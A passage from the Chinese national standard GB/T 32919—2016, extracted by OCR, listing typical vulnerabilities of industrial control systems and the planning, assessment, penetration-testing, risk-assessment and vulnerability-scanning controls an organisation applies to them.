国外情报机构等国家力量利用计算机作为信息收集和间谍活动的一部分,个别国家致力于发展 信息战,通过破坏供给、通信和经济基础设施,对目标国人民的日常生活造成非常重大的影响 A.4 工业控制系统脆弱性分析 A.4.1 工业控制系统脆弱性概述 本章列出的脆弱性是典型工业控制系统可能存在的,这些脆弱性的列出顺序不反映脆弱性发生的 优先性以及脆弱性发生后造成影响的严重性。本章主要从策略和规程、网络和系统平台三方面陈述工 业控制系统中可能存在的脆弱性。实际应用的工业控制系统都会遇到所述脆弱性中的一部分,但也可 能包含下文没有提到的系统独有的脆弱性。 A.4.2 策略和规程脆弱性 表 A.2 描述了工业控制系统策略和规程存在的脆弱性。 表 A.2 工业控制系统策略和规程脆弱性 脆弱性 描述 不精确的工业控制系统安全 策略 不精确的策略经常会把脆弱性引人到工业控制系统中 没有依据工业控制系统的安全 策略,编制明确、具体、书面的安 全规程文档 建立有效安全程序的一个根本措施是:编制明确、具体的安全规程文档,并据此对 有关人员进行培训 没有对工业控制系统进行正式 的安全培训 设计一种文档化的正式安全培训和学习程序,可以使有关人员掌握当时组织上的 安全策略和规程,掌握工业上信息安全标准和建议的实践。如果没有针对特定工 业控制系统策略和规程进行培训,就不能期望有关人员来维护一个安全的工业控 制系统环境 不合理的安全体系架构设计 控制工程人员缺乏安全方面的基本培训,设备和系统供应商的产品中没有必要的 安全特性 没有工业控制系统设备安装使 用指导文件或工业控制系统设 备安装使用指导文件有缺陷 设备安装使用指导文件应及时更新、随时备用。这些指导文件是解决工业控制系 统故障的恢复程序中所必不可少的 缺少安全实施的管理机制 安全方面的实施负责人员应对文档化安全策略和规程承担相应责任 没有工业控制系统特定的持续 运行或灾难恢复计划(DRP) 编制、测试DRP,确保在主要硬件、软件失效中或在服务设施毁坏中是可用的。如 果工业控制系统缺少DRP,就可能导致宕机次数增加,导致生产力的丧失 未对工业控制系统进行审计 独立的安全审计应评审和检查系统的记录和活动,确定系统控制的准确性,并确 保符合已建立的工业控制系统安全策略和规程。审计人员还应当经常检查工业 控制系统安全服务是否缺失,并提出改进建议,这样能够使安全控制措施更有效 没有明确具体的配置变更管理 程序 应当制定并严格执行工业控制系统硬件、固件、软件的变更控制程序和相关程序 文件,以保证工业控制系统得到实时保护,配置变更管理程序的缺失将导致安全 监管疏忽、信息暴露和安全风险 A.4.3 网络脆弱性 表 A.3、表 A.4、表 A.5、表 A.6、表 A.7 分别描述了工业控制系统网络硬件、网络结构、网络边界、通 信和无线连接及网络设备配置五个方面的脆弱性。 表 A.3 工业控制系统网络硬件脆弱性 脆弱性 描述 网络设备物理保护 不足 应该对网络设备的物理访问进行控制,以防止破坏网络设备 缺少坏境控制 缺少环境控制会导致处理器失常。例如, -些处理器在过热情况下会自动关闭实现自我保 护, --些处理器则会烧毁 不安全的物理端口 不安全的通用接口如USB、PS/2等外部接口可能会导致未授权的设备接入 无关人员可以物理 访问网络设备 不合适的对网络设备的物理访问会导致:数据和硬件窃取、数据和硬件的物理损伤破坏、对安 全环境的篡改、未授权的阻止或控制网络行为以及关闭物理数据链路等 表 A.4 工业控制系统网络结构脆弱性 脆弱性 描述 薄 弱 的 网 络 安 全 架构 因业务和操作需要对工业控制系统网络架构的开发和修改,可能在不经意间将安全漏洞引入 网络架构的某一部分中 在控制网中传输非 控制数据 控制数据与非控制数据有着不同的要求,比如可靠性程度不同。因此,在同-个网络中传输 两种流量会存在难以对网络进行配置的问题。例如,非控制流量可能会大量损耗控制流量传 输所需要的资源,导致工业控制系统功能中断 IT网络服务应用在 控制网络中 IT网络中实施的服务,如DNS、DHCP等,在控制网络中被使用时,可能引入额外的严重安全 漏洞 重要网络链路或设 备没有冗余配置 在重要的网络中没有链路或设备兄余备份可能遭遇单点故障 工业控制系统网络边界脆弱性 脆弱性 描述 安 全 边 界 定 义 不 清晰 控制网络边界定义不清晰,将难以保证必要的安全措施被合适的实施或配置,会导致对系统 和数据的未授权的访问和其他问题 网络边界访问控制 措施不当 缺少或未配置合适的边界访问控制措施会导致无用数据在网络间传递。这会引起多种问题, 如攻击和病毒在网络中扩散,可以在其他网络中对控制网中敏感数据进行监控和窃听及对系 统进行非法访问等 通信和无线连接脆弱性 脆弱性 描述 使用标准的、有文档 记 载 的 明 文 通 信 协议 攻击者可以使用协议分析器或者其他设备解码ProfiBus、T)NP、Modbus等协议传输的数据,实 现对工业控制系统的网络监控。使用这些协议也可以使攻击者更容易攻击工业控制系统或 控制工业控制系统网络行为 缺少用户、数据或设 备的认证 许多工业控制系统协议不具备认证机制。没有认证,就会存在重放或篡改数据的可能性 缺 少 通 信 完 整 性 保护 大部分的工业协议不具备完整性检查机制。攻击者可以操纵这种没有完整性检查的通信 无线连接客户端与 接人点间认证不足 无线客户端与接入点之间需要完整的相互认证,保证客户端访问的不是攻击者伪造的接入 点,同时也保证非法人侵者无法访问工业控制系统无线网络 无线连接客户端与 接入点间数据保护 不力 无线客户端与接入点间传递的敏感数据未采用加密保护,攻击者监听明文信息造成信息泄露 表 A.7 工业控制系统网络设备配置脆弱性 脆弱性 描述 没 有 使 用 数 据 流 控制 未采用数据流控制机制,如利用访问控制列表(AC[),限制系统或人对网络设备的直接访问 I T 安 全 设 备 配 置 不当 使用缺省配置往往导致主机上运行了不必要的开放端口和可能被威胁所利用的网络服务。 不当的防火墙配置规则和路由器访问控制列表将允许不必要的流量通过 没有备份网络设备 配置 没有制定和实施网络设备配置备份和恢复规程,对网络设备的配置偶然或者恶意的修改可能 造成系统通信中断并无法及时恢复 传输中没有对口令 进行加密 以明文传输的门令很容易被攻击者窃听,攻击者会利用这些口令对网络设备进行非法访问。 通过这种访问,攻击者可以破坏工业控制系统操作或者监视工业控制系统网络行为 网络设备口令未及 时更新 密码应定期更换,这样,即使未授权用户获得密码,也只有很短的时间段内可以访问网络设 备。末定期更换密码可能使黑客破坏工业控制系统的操作或监视器工业控制系统的网络 活动 采 用 的 访 问 控 制 不足 通过非法访问网络设备,攻击者可以破坏工业控制系统操作或者监视工业控制系统网络行为 A.4.4 平台脆弱性 表 A.8、表 A.9、表 A.10、表 A.11 分别描述了工业控制系统平台硬件、平台软件、平台配置及平台病 毒防护四个方面的脆弱性。 表 A.8 工业控制系统平台硬件脆弱性 脆弱性 描述 重要系统安全保护 不足 许多远程设备没有配备专门的运行维护工作人员·也没有物理监视技术手段 缺少环境控制 缺少适当的环境控制措施会导致处理器不能正常工作 例如温度过高时, 一些处理器会自动 关闭, ·些会烧熔 未授权人员对设备 的物理访问 考虑到有紧急关闭或重启之类的安全要求,应保证只有必要的人员可以物理访问工业控制系 统设备.对工业控制系统设备访问不当会导致:数据和硬件窃取、数据和硬件的物理损伤和 破坏、对功能环境(例如:数据连接,可移动介质的未授权使用,增加/移除设备)的非法篡改、 物埋数据链路关闭、检测不到的数据拦截或窃听(键盘输入或其他录入方式) 无 线 频 率 和 电 磁 脉冲 无线电磁波会损害控制系统中的硬件。造成的影响轻则扰乱命令和控制,重则对电路板造成 永久损坏 缺少备份电源 重要资产缺少备份电源, 一旦停电工业控制系统就会关闭,导致不安全事件发生 重要组件没有宄余配置 重要的组件没有备份会导致单点故障 工业控制系统平台软件脆弱性: 脆弱性 描述 缓冲溢出 工业控制系统软件可能存在缓存溢出的问题。攻击者可以利用这一点实施攻击 缺省配置为关闭的 安全功能 如果关闭或者不使用产品自带的安全功能,那么这样的安全功能将不能起到作用 拒绝服务攻击 工业控制系统软件可能遭受DoS攻击,导致系统不能被合法用户访问,或者系统操作和功能 延迟 对未定义、定义不明 或“非法”情况的错 误处理 一些工业控制系统实施可能遭受格式错误或者包含非法域值的包的攻击 依 赖 R P C 和 D C O M 的 O P C 不升级系统补丁,RPC/DCOM的脆弱性可能被利用来攻击OPC 使用不安全的工业 控制系统协议 DNP3.0、Modbus、IEC 60870-5-101、IEC 60870-5-104和其他一些协议在工业中被普遍使用,而 且协议的相关信息随处可得。这些协议只有很少或根本不包含安全功能 使用明文 许多工业控制系统协议以明文方式传递信息,导致消息很容易被攻击者窃听 配置和程序软件的 认 证 和 访 问 控 制 不足 攻击者可以通过非法访问配置和程序软件破坏设备或系统 没有安装入侵检测 和防御软件 入侵行为会导致系统不可用,数据被截获、修改和删除,控制命令的错误执行 T.业控制系统安全 后门 不法供应商为了各种目的,给系统设置的后门,这些后门的危害特别大 通信协议脆弱性 工业控制系统采用的部分通信协议,由丁设计原因存在安全脆弱性,这些协议脆弱性可能被 攻击者利用,造成系统的不可用,数据被截获、修改和删除,控制系统执行错误的动作等等 工业控制系统平台配置脆弱性: 脆弱性 描述 没有及时安装操作系 统和应用安全补丁 未及时补丁的操作系统和应用可能包含新发现的脆弱性,这些脆弱性可能会被攻击所利用 没有经过彻底的测 试就安装了操作系 统和应用安全补丁 操作系统和应用的安全补丁不经测试就安装可能会对工业控制系统的正常操作产生影响 使用缺省配置 缺省配置中往往会开放不安全或者不必要的端U、服务和应用 重要的配置没有被 存储或备份 没有制定和实施工业控制系统软硬件配置备份和恢复规程,对系统参数意外或者恶意的修改 可能造成系统故障或数据丢失 便携设备上数据未 受保护 假如敏感数据(密码,拨号号码)以明文方式存储在了移动设备上,比如笔记本、PDA,那么-- 旦这些设备丢失了或者被偷了,系统安全就会遭受极大威胁 缺 少 恰 当 的 口 令 策略 没有口令策略,系统就没有了合适的口令控制,使得对系统的非法访问更容易。口令策略是 整个工业控制系统安全策略的一部分,口令策略的制定应考虑到工业控制系统处理复杂口令 的能力 未使用口令 应该在工业控制系统组件上使用口令以阻止非法访问。口令相关的脆弱性包括:系统登录无 口令(如果系统有用户账户);系统启动无口令(如果系统没有用户账户);系统待机无口令(如 果工业控制系统组件一段时间内没被使用) 口令使用不当 应该保证口令的安全,防止非法访问。包括:以明文方式将口令记录在本地系统;和同事的个 人账户使用同一的口令;在收受贿赂后,将口令交给潜在攻击者;在未受保护的通信中以明文 方式传输口令 访问控制不当 访问控制方法不当,可能使工业控制系统用户具有过多或过少的权限。如采用缺省的访问控 制设置使得操作员具备了管理员特权 没有安装入侵检测 和防御软件 入侵行为会导致系统不可用,数据被截获、修改和删除,控制命令的错误执行 不安全的工业控制 系统组件远程访问 系统工程师或厂商在无安全控制措施的情况下,实施对工业控制系统的远程访问,可能致工 业控制系统访问权限被非法用户获取 没有安装病毒防护软件 恶意软件会导致系统性能低下、系统不可用和数据被截获、修改和删除。因此需要安装病毒 防护软件,比如杀毒软件,防止系统感染病毒 病毒防护软件病毒 库过期 病毒防护软件病毒库过期导致系统容易被新的病毒攻击 没经过仔细的测试就安装病毒防护软件及其病毒库升级包 未经测试就安装病毒防护软件及其病毒库升级包可能会影响工业控制系统的正常运行 工业控制系统安全控制列表 B.1 规划(PL) B.1.1 安全规划策略和规程(PL-1) 控制要求: 组织应: a) 制定并发布安全规划的策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相关部门 间的协调和合规性; b) 制定并发布安全规划规程,以推动安全规划的策略及与相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对安全规划的策略及规程进行评审和更新。 补充指导; a) 通过该控制来产生一些能有效实现安全规划族中安全控制和控制增强的策略与规程; b) 该策略和规程应与相关法律、法规、规章、制度、政策、标准和指南是一致的; c) 安全规划策略可作为组织信息安全策略的一部分; d) 安全规划规程可针对一般性的安全程序予以开发,当需要时,可针对特殊 ICS 予以开发。 控制增强:无 B.1.2 系统安全规划(PL-2) 控制: 组织应: a) 开发与组织使命和业务功能相一致的 ICS 安全计划,该计划应包括: 1) 显式地定义了系统的授权边界; 2) 通过组织使命和业务过程,描述了 ICS 的运行环境; 3) 提供了ICS 的安全定级及定级理由; 4) 描述了与其他 ICS 的关系或连接; 5) 提供了该系统的安全需求概要; 6) 描述了满足安全需求的已有的或规划的安全控制,以及剪裁和补充决策的理由; 7) 在计划实现前,是否得到评审和批准; b) 按【赋值:组织定义的时间间隔】,评审ICS 安全计划 c) 为了强调 ICS 和运行环境的变更,根据安全计划实现期间或安全控制评估期间所标识的问题, 对该计划进行调整。 补充指导; a) 关于“控制”实例化要求 安全计划内含一些有意义的信息,包括对安全控制中“赋值”和“选择”陈述的参数规约,包括通过 参考文献有关参数的规约,以便能无歧义地实现安全控制,符合该安全计划的意图,并能使以后作出如 下判断:如果该计划按预期实现,还存在哪些对组织运行和资产以及对个体、其他组织和国家的风险。 b) 关于计划实现基本要求 安全计划实现前,应得到授权官员或其代表的评审和批准,并作为组织风险管理战略的一部分。 c) 相关安全控制:AC-2、AC-6、AC-14、AC-17、AC-20、CA-2、CA-3、CA-7、CM-9、CP 2、IR-8、MA 4、MA-5、MP-2、MP-4、MP-5、PL-7、PM-1、PM-7、PM-8、PM-9、SA-5、SA-17。 控制增强: a) 组织为 ICS 开发安全操作概念,至少包括:系统意图、系统体系架构描述、安全授权安排、安全 定级以及定级决策中所考虑的相关因素; b) 按【赋值:组织定义的时间间隔】,评审并调整安全操作概念; 增强补充指导: 1) 安全操作概念可以包含在 ICS 安全计划中; c) 组织为ICS 开发功能体系结构,该结构标识并维护所有外部接口,通过接口交换的信息以及与 每一接口相关联的保护机制; d) 应定义用户角色,以及为每一角色所赋予的访问权限 e) 唯一独特的安全需求,例如,对暂时闲置的关键数据元素进行加密 f) 按可用相关法律、法规、方针、政策、标准和指南,ICS 的安全定级,以及任意特殊的保护要求 g) 信息恢复优先级或ICS 服务的优先级。 B.1.3 行为规则(PL-3) 控制: 组织应: a) 针对ICS 的用法,建立并制定所有 ICS 用户的行为规则,描述他们的责任和期望的行为 b) 在授权访间ICS 前,接受来自用户签署的有关他们已经阅读的、理解的和同意遵守该行为规 则方面的意见。 补充指导: a) 组织应基于用户的角色和责任、考虑·.些不同的规则集,例如.适用于特权用户的规则和适用 于一般角色的规则之间的区分; b) 可使用电子签名,作为认可的行为规则。 c) 相关安全控制:AC-2 、AC-6,AC-8 、AC-9 、AC-17 、AC-18 、AC-19 、AC-20 、AT-2 、AT-3 、CM-11、 IA-2、IA-4、IA-5、MP-7、PS-6、PS-8、SA-5。 控制增强: a) 在行为规则中,组织应显式地限制对外部网站的使用,限制共享系统的账户信息。 B.1.4 信息安全架构(PL-4) 控制: 组织应: a) 基于纵深防御的思想制订工业控制系统的信息安全架构,描述信息安全保护的需求、方法及有 关外部服务的安全假设或依赖关系; b) 按【赋值:组织定义的时间间隔】审核并更新信息安全架构 c) 考虑信息安全体系的变更对安全规划、系统采购过程的影响。 补充指导: a) 该控制专注于组织设计开发 ICS 需关注的行为 b) 信息安全结构包括架构描述、安全功能配置和分配、外部接口的安全相关信息、信息交换的接 口以及与每个接口相关联的保护机制等; e) 信息安全架构可以包括其他重要的安全相关信息,如:用户角色和访问权限分配、独特的安全要求、信息处理类型、存储和传输的系统、系统服务恢复优先级以及任何其他特定的保护 需求; d) 相关安全控制:CM-2 、CM-6、PL-2、PM-7 、SA-5。 控制增强: a) 应基于纵深防御的思想设计信息安全架构; b) 应在预定义的位置和架构层部署特定的安全防护以获得全面的安全保障。 B.1.5 安全活动规划(PL-5) 控制: a) 在可影响ICS 的安全活动进行前,组织应规划并协调,以便减少对组织运行、组织资产和个体 的影响。 补充指导: a) 与安全有关的活动,例如包括:安全评估、安全审计、硬件和软件的维护以及持续性计划的测试 和演练; b) 组织事先所进行的规划和协调,包括两个方面:应急情况和非应急情况; c) 相关安全控制:PL-2。 控制增强:无 B.2 安全评估与授权(CA) B.2.1 安全评估与授权策略和规程(CA-1) 控制: 组织应: a) 制定并发布安全评估与授权策略及规程方针策略,内容至少应包括:目的、范围、角色、责任、管 理层承诺、相关部门间的协调和合规性; b) 制定并发布安全评估与授权方针策略及规程,以推动安全评估与授权策略及与相关安全控制 的实现; c) 按【赋值:组织定义的时间间隔】,对安全评估与授权策略和规程进行评审和更新。 补充指导: a) 通过该控制来有效实现安全评估与授权族中安全控制和安全增强的策略和规程; b) 这些策略和规程要与相关法律、法规、政策和标准保持一致; c) 安全评估与授权策略可作为组织信息安全策略的…部分; d) 安全评估与授权规程一般可针对安全程序予以开发,当需要时也可针对特殊的ICS 予以 开发; e) 在开发安全评估与授权策略中,组织风险管理战略是一个重要的因素。 控制增强:无 B.2.2 安全评估(CA-2) 控制: 组织应: a) 按【赋值:组织定义的时间间隔】评估ICS 安全控制,以确定这些控制正确实现程度,按预期运 行的程度,产生期望结果的程度,是否满足系统的安全需求; b) 产生评估报告,记录评估结果。 GB/T 32919—2016 补充指导; a) 组织应评估 ICS安全控制,作为满足安全需求年度评估的一部分,作为持续监视的一部分,作 为 ICS 开发生存周期中系统测试和评估的一部分; b) 评估报告按【赋值:组织要求的详细程度】来记录评估结果,以便确定该报告的准确性和完 备性; c) 按安全需求,在【赋值:组织定义的时间间隔】内进行一次安全评估,最少一年进行一次安全 评估; d) 为了满足年度评估要求,组织可持续监视或作为系统开发生存周期过程一部分的 ICS 测试和 评估,勾画出信息安全评估结果; e) 现有的安全评估结果,只要仍然有效,可在一定程度上予以复用,并在需要时与附加的评估 互补; f) 安全评估活动绝对不能影响 ICS 正常运行; g) 如果必须离线评估 ICS, 应将评估活动安排在计划好的 ICS 停机阶段; h) 某些情况下,组织认为 ICS 在线测试不可取或不适用或可能产生负面影响,应按裁剪指导,使 用合适的补偿控制(例如,提供一个替代的系统进行评估),并在安全计划中记录原因; i) 相关安全控制:CA-4、CA-6、CA-7。 控制增强: a) 组织应使用独立的评估人员和评估组织,进行 ICS 中的安全评估; b) 作为安全评估的一部分,组织应【赋值:组织定义的时间间隔】开展【选择:深度监视、恶意用户 测试、渗透测试或组织定义的其他形式的安全测试】。 增强补充指导: 1) 渗透测试演练物理方面和技术方面的安全控制。渗透测试的标准方法包括:测试前分 析,基于目标系统的整个了解;测试前潜在脆弱性的标识,基于测试前分析;对于所标识 脆弱性,确定其可利用性所设计的测试; 2) 在任一渗透测试场景开始前,各方应就详细的测试规则达成一致意见;这些规则与实施 攻击中的威胁源所使用的工具、技术和规程是相互联系的; 3) 进行渗透测试的渗透代理或渗透小组,其独立程度可由组织的风险评估予以指导,做出 相应的决策; 4) 进行红色小组演练,作为模拟的敌对方,尝试破坏组织使命和业务过程,以便提供一个综 合详细的 ICS 和组织的安全能力评估; 5) 渗透测试可以是以实验室为基础的测试,但一般期望是更综合性的,并反映实际条件的 测试; 6) 进行 ICS 监视、恶意用户测试、渗透测试、红色小组演练以及其他形式的安全测试,其目 的是为了通过演练,来改善组织的实际现状,作为关注组织改进系统和组织安全状态的 行为的一种手段; 7) 依据相关法律、法规、政策、制度和标准的要求进行测试; 8) 测试方法要得到授权官员的批准,其中应与组织风险管治功能部门协调; 9) 在红色小组演练期间,覆盖的脆弱性应编入到脆弱性修补过程中; c) 组织应开发并使用安全评估计划,描述 ICS 要予评估的可用的安全控制和控制增强,描述评估 环境,评估范围,评估组以及评估角色和责任; d) 组织应开发并使用评估规程文档,其中包含实现的安全控制和控制增强的详细描述,以及该 实现如何在评估期间得以验证; e) 组织应向相关主管部门汇报书面形式的安全评估结果。 GB/T 32919—2016 B.2.3 ICS 连接管理(CA-3) 控制: 组织应: a) 制定 ICS 与其他 ICS 互联安全规定,授权 ICS 与外部其他系统进行连接; b) 对 ICS 与外部其他工业控制系统连接的接口特征、安全要求、通信信息特性等内容进行记录; c) 在【赋值:组织定义的时间间隔】评审 ICS 与外部的连接情况,以验证 ICS 连接是否符合规定 要求。 补充指导: a) 组织应评估ICS 中的安全控制,作为满足安全需求年度评估的一部分,作为持续监视的一部 分,作为 ICS 开发生存周期过程中系统测试与评估一部分; b) 评估报告应按组织要求的详细程度来记录评估结果,以便确定该报告的准确性和完备性; c) 按安全需求,按【赋值:组织定义的时间间隔】进行安全控制评估; d) 为了满足年度评估需求,组织可持续监视或作为系统开发生存周期过程一部分的 ICS 测试和 评估,勾画出信息安全评估结果; e) 现有的安全评估结果,只要仍然有效,可在…定程度上予以复用,并当需要时与附加的评估 互补; f) 相关安全控制:AC-2、AC-4。 控制增强: a) 组织应阻止把未分保密等级的国家安全系统直接连接到外部网络。 增强补充指导: 1) 不直接连接,意指在没有使用得到批准的边界保护设备(例如防火墙)的情况下,不能连接 到外部网络。 b) 组织应阻止把具有保密等级的国家安全系统直接连接到外部网络。 增强补充指导: 1) 不直接连接,意指在没有使用得到批准的边界保护设备(例如防火墙)的情况下,不能连 接到外部网络; 2) 得到批准的边界保护设备(一般是予以管理的接口/跨域系统),提供从该工业控制系统 到外部与AC-4 一致的网络之信息流执行。 B.2.4 实施计划(CA-4) 控制: 组织应; a) 制定行动计划,在其中记录下拟采取的整改行动,以改正在安全控制评估中发现的弱点和不 足,减少或消除系统中的已知漏洞; b) 根据安全评估、后果分析和持续监控的情况,按【赋值:组织定义的时间间隔】更新现有的行动 计划。 补充指导: a) 该计划记录了组织为纠正在安全评估期间所发现的弱点或不足所规划的修补动作,月的是减 少或消除系统中已知的脆弱性; b) 行动计划是安全授权包中的一个关键文档; c) 该计划的调整是基于安全评估中、安全影响中的发现,并继续进行监视活动; d) 相关安全控制:CA-2、CA-7、CM-4。 控制增强: a) 组织应使用有助于实施计划准确、适时和到时可用的自动化机制。 B.2.5 安全授权(CA-5) 控制: 组织应: a) 指定【赋值:高层管理人员】作为ICS 的授权责任人; b) 未经授权责任人正式授权,ICS 不得投人运行; c) 在【赋值:组织定义的时间间隔】或发生重大变更时,对 ICS 重新进行安全授权。 补充指导; a) 授权责任人应具有 ICS 的预算能力,或负责系统所支持的组织使命或业务运行; b) 通过安全授权过程,授权责任人应考虑与ICS 运行相关联的安全风险,相对应的,授权责任人 应在与理解和接受 ICS 相关安全风险相称的管理岗位; c) 通过使用综合持续的监视过程,持续地调整授权(如包含风险评估的安全计划)中所包含的关 键信息、安全评估报告以及行动计划,向授权责任人和 ICS 拥有者提供及时的 ICS 安全状态 d) 为了减少管理安全再授权的成本,授权责任人应使用持续监视过程的结果,尽可能按那个基 础,做出再授权的决定; e) 相关安全控制:CA-2 、CA-7 、PM-9。 控制增强:无 B.2.6 持续监控(CA-6) 控制: a) 组织应持续监视 ICS 中的安全控制。 补充指导: a) 持续监视程序允许组织依据变化的威胁、脆弱性、技术、使命和业务过程,在高动态运行环境中 及时维护 ICS 的安全授权; b) 使用自动化支持工具来持续监视安全控制,进行实时的ICS 风险管理; c) 有效的持续监视程序包括:ICS 构件的配置管理和控制、系统变更或其运行环境的变更的安全 影响分析、持续评估安全控制和 ICS 状态报告; d) 该控制与监视配置变更中所需要的活动紧密相关并相互支持。有效的持续监视程序,导致不 断地调整安全计划、安全评估报告、动作和里程碑计划; e) 严格和良好地执行持续监视程序.可充分地减少重新授权 ICS 所需要的工.作量 f) 组织应确保评估不干扰 ICS 的功能; g) 相关安全控制:CA-2 、CA-4 、CA-5 、CM-3 、CM-4。 控制增强: a) 组织应使用独立评估人员或评估组织,在持续的基础上来监视工业控制系统的安全控制。 增强补充指导: 1) 组织在持续监视期间,通过要求独立评估人员或小组评估工业控制系统授权周期期间所 有安全控制,可以扩大并最大化安全控制持续评估的价值。 b) 组织应【赋值:组织定义的时间间隔】规划、安排并进行评估,宣布或不宣布【选择:深度监视、 恶意用户测试、渗透测试、红色小组演练或组织定义的其他形式的安全评估】,以便确保符合 所有脆弱性缓解过程。 增强补充指导: GB/T 32919—2016 1) 脆弱性缓解规程的例子包含在信息保障脆弱性警告中,期望通过测试来确保工业控制系 统的安全能力,持续提供准确的保障,以免不断演化威胁和脆弱性。 2) 符合性测试还提供了独立的确认。 3) 参见CA-2 的补充指导,增强 b)给出了恶意用户测试、渗透测试、红色小组演练以及其他 形式的安全测试的进一步信息。 B.2.7 渗透测试(CA-7) 控制: a) 组织应按【赋值:组织定义的时间间隔】对ICS 及组件执行渗透测试,以保障ICS 能够抵抗一定 强度的攻击。 补充指导: a) 渗透测试通过模仿攻击者攻击的方式,来分析ICS 系统或组件可能存在的脆弱性和漏洞; b) 渗透测试是一种特殊的 ICS 系统或组件进行评估方式,以发现可能被攻击者利用的漏洞; c) 渗透测试用来验证的漏洞被利用程度,以及可能遭受的损坏; d) 渗透测试可以针对ICS 硬件、软件或固件组件进行; e) 相关安全控制:CA-2。 控制增强: a) 组织应聘请专业的第三方渗透组织或团队对 ICS 开展渗透测试。 B.2.8 内部连接(CA-8) 控制: a) 组织应对连接 ICS 及组件的内部系统进行授权; b) 应对每个内部连接的系统特性、安全性要求、通信方式、交互内容等进行归档登记。 补充指导: a) 该控制适用于组织内与 ICS 连接的所有系统,包括移动设备、笔记本/台式电脑、打印机、复印 机、传真机、扫描仪、传感器和服务器等。 b) 相关安全控制:CA-3、CA-4。 控制增强: a) 在建立内部连接前,在ICS 系统或组件上执行安全合规性检查。 B.3 风险评估(RA) B.3.1 风险评估策略和规程(RA-1) 控制: 组织应: a) 制定并发布正式的风险评估策略,其中应包含目的、范围、角色、责任、管理承诺、组织各部门间 的协调以及合规性; b) 制定并发布正式的风险评估规程,以推动风险评估策略及与相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对风险评估策略和规程进行评审和更新。 补充指导: a) 期望通过该控制来有效实现风险评估族中安全控制以及安全增强的策略和规程; b) 该策略和规程应与相关法律、法规、政策、规章、制度、标准和指南保持一致; c) 风险评估策略可作为组织信息安全策略的一部分; d) 风险评估规程可针对一般性的安全程序予以开发,也可针对特殊 ICS 予以开发; e) 在开发配置管理策略中,组织的风险管理战略是一个重要的因素。 控制增强:无 B.3.2 安全分类(RA-2) 控制: 组织应: a) 按国家法律、法规、政策和标准,对 ICS 进行分类; b) 在该ICS 的安全计划中,记录安全分类结果(包括这样分类的理由); c) 确保对该安全分类决定进行了评审,并得到授权官员的批准。 补充指导: a) 安全分类描述了信息和ICS 受到破坏后,丧失保密性、完整性或可用性对组织运行、组织资产 和人员潜在的负面影响; b) 组织进行安全分类过程,作为大量组织的一项活动,涉及到首席信息官、高层信息安全官、ICS 拥有者、关键使命拥有者等; c) 组织还要考虑对其他组织的负面影响; d) 安全分类过程支持信息资产目录的创建,与 PM-8(配置管理族:ICS 构件目录)一起,把目录 中信息资产映射到处理、存储和传输信息的系统部件; e) 相关安全控制: CM-8、MP-4、RA-3 、SC-7。 控制增强:无 B.3.3 风险评估(RA-3) 控制: 组织应: a) 进行风险评估,包括对支持组织运行的信息和 ICS 的未授权访问、使用、泄露、破坏、修改、毁 坏,所造成损害的可能性和严重程度; b) 按【赋值:组织定义的时间间隔】,评审风险评估的结果; c) 按【赋值:组织定义的时间间隔】,或当标识了新的威胁和脆弱性,或出现了可能影响系统安全 状态的其他条件时,或当 ICS 或运行环境进行重大改变时,调整风险评估。 补充指导: a) 风险评估中应主要考虑:脆弱性、威胁源,以及所规划的或已有的安全控制,月的是为了确定在 该 ICS 运行中,组织运行和资产、个体、其他组织和国家所具有的残余风险程度; b) 风险评估中还要考虑组织运行和资产或来自外部组织的个体(例如:服务提供者,评估组织 ICS 的个体,外部实体)所带来的风险; c) 风险评估中应遵循相关法律、法规和政策要求; d) 相关安全控制:RA-2 、PM-9。 控制增强:无 B.3.4 脆弱性扫描(RA-4) 控制: 组织应: a) 按【赋值:组织定义的时间间隔】或按【赋值:组织定义的过程】,或当标识并报告了新的可能影 响系统的脆弱性时,对系统和主机应用进行扫描; GB/T 32919—2016 b) 依据采用的标准,使用脆弱性扫描工具和技术来: 1) 列举平台、软件缺陷和不合适的配置; 2) 格式化和使之透明,并产生检测列表以及相应的测试规程; 3) 度量脆弱性影响; c) 分析由安全控制评估所产生的脆弱性扫描报告和结果; d) 依据组织的风险评估,按【赋值:组织定义的响应时间】,修补脆弱性; e) 与【赋值:指定的组织内人员】,共享脆弱性扫描过程和安全控制评估中的信息,以助于消除在 其他 ICS 中类似的脆弱性。 补充指导: a) 关于该控制的输入:ICS 的安全分类,可指导脆弱性扫描频率和详细程度。 b) 关于实施该控制的方法:对于定制软件和应用的脆弱性分析,可能需要一些附加的、更详细的 特殊技术和途径(例如:源代码评审,源代码分析等)。 c) 关于扫描对象:脆弱性扫描包括对用户或设备是不可访问的特定功能、端口、协议和服务,以及 对不合适的配置或不正确操纵信息流的机制。 d) 关于实施该控制所使用的工具:组织可考虑使用兼容国家漏洞数据库命名规则中脆弱性并使 用开放的脆弱性评估语言的工具,来测试存在的脆弱性。 e) 在 ICS 网络上进行脆弱性扫描和渗透测试要确保ICS 功能不受到扫描过程的负面影响。 f) 在非 ICS 网络上使用脆弱性扫描工具,也应特别小心,以确保它们没有扫描ICS 网络。 g) 在组织基于其特定的理由不在生产的ICS 上进行脆弱性扫描的情况下,组织应按裁剪指导, 使用补偿控制。 h) 相关安全控制:CA-2、CA-7、CM-4、CM-6、RA-2、RA-3、SA-11、SI-2。 控制增强: a) 组织使用的脆弱性扫描工具,应具有容易调整扫描配置能力; b) 组织按【赋值:组织定义的时间间隔】,或当标识和报告新的脆弱性时,调整已扫描的 ICS 脆 弱性; c) 组织使用可证实具有一定深度和广度覆盖的脆弱性扫描系统; d) 组织应明确 ICS 中的什么信息不应被泄露; e) 为支持更全面的扫描活动,对组织标识的 ICS 组件,应被赋予特定的访问授权; f) 组织应使用自动化机制及时比较脆弱性扫描结果,以便确定ICS 脆弱性的趋势; g) 按【赋值:组织定义的时间间隔】,组织使用自动化机制来发现当前 ICS 中存在的未授权软件; h) 组织评审历史审计日志,确定所标识的脆弱性是否以前得以利用; i) 组织应进行ICS 的脆弱性分析,基于脆弱性分析,执行 ICS 上的渗透测试,以便确定所标识的 脆弱性的可利用性。 增强补充指导: 渗透测试的标准方法包括: 1) 基于对该 ICS 的完整了解,所进行的测试前分析; 2) 基于测试前分析,标识测试前潜在的脆弱性; 3) 进行设计的测试,确定所标识脆弱性的可利用性。 B.4 系统与服务获取(SA) B.4.1 系统与服务获取策略和规程(SA-1) 控制: GB/T 32919-2016 组织应: a) 